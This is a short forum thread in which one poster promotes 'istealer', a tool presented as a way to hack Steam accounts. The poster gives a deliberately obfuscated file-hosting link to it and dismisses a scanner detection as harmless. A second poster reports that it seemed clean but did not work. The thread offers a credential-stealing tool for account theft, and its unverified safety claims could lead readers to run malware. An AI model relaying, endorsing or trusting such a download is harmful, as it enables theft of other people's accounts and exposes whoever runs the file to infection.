Hack steam accounts

Posts 1–2 of 2 · Page 1 of 1
Hack steam accounts
I was just looking through youtube videos and I saw one of how to hack steam accounts, i was like its gonna be a virus. Then i scanned it and no viruses where on it(detection 1 coz hacking tool). So here i am now with a steam account.

Dont flame my thread.

Yes im new here so if you dont trust me than dont download

its called istealer

upp it (dot)com/v/QBX3SFHR . no spaces. put dot

Copy and paste
Seems clean but not working then again I have two firewalls on of them could of broke it.

And incase anyone was wondering why I have 2 firewalls it's because it makes me feel special jk :P
2 Firewalls = Safety
Posts 1–2 of 2 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

Talk with us